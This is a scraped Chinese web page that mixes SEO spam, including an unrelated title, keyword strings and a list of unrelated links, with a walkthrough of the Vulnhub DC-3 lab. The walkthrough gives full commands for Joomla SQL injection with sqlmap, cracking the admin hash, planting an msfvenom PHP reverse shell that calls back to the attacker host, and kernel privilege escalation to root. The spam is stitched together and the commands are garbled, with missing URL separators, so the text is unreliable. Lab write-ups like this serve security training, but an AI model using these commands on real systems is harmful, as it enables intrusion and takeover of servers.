当前位置: 首页 > news >正文

昆明网站推广公司源码站

昆明网站推广公司,源码站,南宁网站建设王道下拉強,天河网站+建设信科网络文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 靶场下载地址#xff1a;https://download.vulnhub.com/dc/DC-3-2.zip kali#xff1a;192.168.144.148 DC-3.2#xff1a;192.168.144.151 更改驱动器连接设置#xff1a; 二、渗透流程 1、信息收集nmap -T5 -… 文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 靶场下载地址https://download.vulnhub.com/dc/DC-3-2.zip kali192.168.144.148 DC-3.2192.168.144.151 更改驱动器连接设置 二、渗透流程 1、信息收集nmap -T5 -sV -sT -p- -A 192.168.144.1512、探测网站内容1.访问192.168.144.151 2.web指纹扫描如下 网站使用joomla CMS使用joomscan工具扫描 joomscan --url 192.168.144.151 点击了解joomscan扫描工具使用详解 3.漏洞获取 可用信息获取到joomla版本3.7.0寻找相关版本漏洞searchsploit joomla 3.7.0 -w 搜索结果显示两个漏洞 CVE-2015-8562 反序列化漏洞https://www.exploit-db.com/exploits/43488 CVE-2017-8917 SQL注入漏洞https://www.exploit-db.com/exploits/42033 CVE-2015-8562 反序列化漏洞 CVE-2017-8917 SQL注入漏洞 3、 CVE-2017-8917 SQL注入漏洞利用 exploits-db数据库记录了详细的利用过程如下 1.获取数据库 sqlmap -u http://192.168.144.151/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent --dbs -p list[fullordering]2.joomladb数据库的表 sqlmap -u http://192.168.144.151/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb --tables3.“#__users” 表的字段 sqlmap -u http://192.168.144.151/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml --risk3 --level5 --random-agent -D joomladb -T #__users -C name,password --dump 4.密码解密 password采用bcrypt加密 bcrypt加密算法详解 使用john破解密码snoopy vi创建dc-3.2将密码保存到dc-3.2 john爆破密码 john dc-3.2 --show 密码为snoopy 5.进入后台 adminsnoopy登陆后台地址http://192.168.144.151/administrator 4、获取权限 1.生成反弹shell 将shell内容复制到刚创建的dc.php文件中 msfvenom -p php/meterpreter/reverse_tcp LHOST192.168.144.148 LPORT4444 dc.php2.kali开启监听 use exploit/multi/handler set payload /php/meterpreter/reverse_tcp set LHOST 192.168.144.148 set LPORT 4444 run3.访问webshell地址 http://192.168.144.151/templates/protostar/dc.php 4.获取临时shell shell #获取临时shell python -c import pty;pty.spawn(/bin/bash) #交互式shell5、提权 1.获取服务器版本 uname -a lsb_release -a2.ubuntu 16.04 相关漏洞 searchsploit ubuntu 16.04 3.下载提权exp cat /usr/share/exploitdb/exploits/linux/local/39772.txt 4.通过蚁剑将exploit.tar上传至脚本所在目录 5.解压exploit.tar 6.获取root权限 三、思路总结 1、只开放80端口的情况下网站指纹、目录扫描等方向 2、通过网站CMS版本信息搜索相关版本漏洞 3、利用版本SQL注入漏洞获取后台登录账号密码 4、后台寻找webshell插入地址 5、获取shell寻找服务器版本漏洞 6、利用服务器版本漏洞提权参考链接https://blog.mzfr.me/vulnhub-writeups/2019-07-12-DC3
http://www.w-s-a.com/news/778999/

相关文章:

  • 怎么样推广自己的网站wordpress register_form
  • 网站公司建站凤翔网站建设
  • 网站建设协低价格的网站建设公司
  • 研发网站建设报价深圳网站建设前十名
  • 宠物发布网站模板wordpress中文免费电商模板
  • 济南做网站创意服装品牌策划公司
  • 本地电脑做视频网站 外网连接不上软件商城源码
  • 足球直播网站怎么做crm系统介绍
  • 株洲网站建设联系方式东莞凤岗网站制作
  • 小纯洁网站开发如何注册域名
  • 网上做试卷的网站如何把刚做的网站被百度抓取到
  • 滕州网站建wordpress用户中心按钮不弹出
  • 清远新闻最新消息福建seo搜索引擎优化
  • 凡客建站网微信网站怎么做的
  • 网站建设费怎么写会计科目行业网站建设公司
  • 网站里的友情链接网站建设个人简历的网页
  • 佛山自助建站软件湖南seo优化推荐
  • 免费微信微网站模板下载不了优化人员配置
  • wordpress 导航网站主题画流程图的网站
  • 皮卡剧网站怎样做排名网
  • 网站开发 兼职哪个网站是做安全教育
  • 商品展示类网站怎么用群晖nas做网站
  • 长腿蜘蛛wordpresssem优化推广
  • 中国铁路建设监理协会官方网站深圳福田区怎么样
  • 互联网网站开发发展wordpress文章自定义栏目
  • 众筹网站平台建设工信部网站备案系统
  • 网站301重定向代码wordpress 加子目录
  • 淄博网站制作优化推广asp做学生信息网站
  • 海口招商建设有限公司网站淮安哪有专业做网站的公司
  • 喀什哪有做网站的国内正规seo网络推广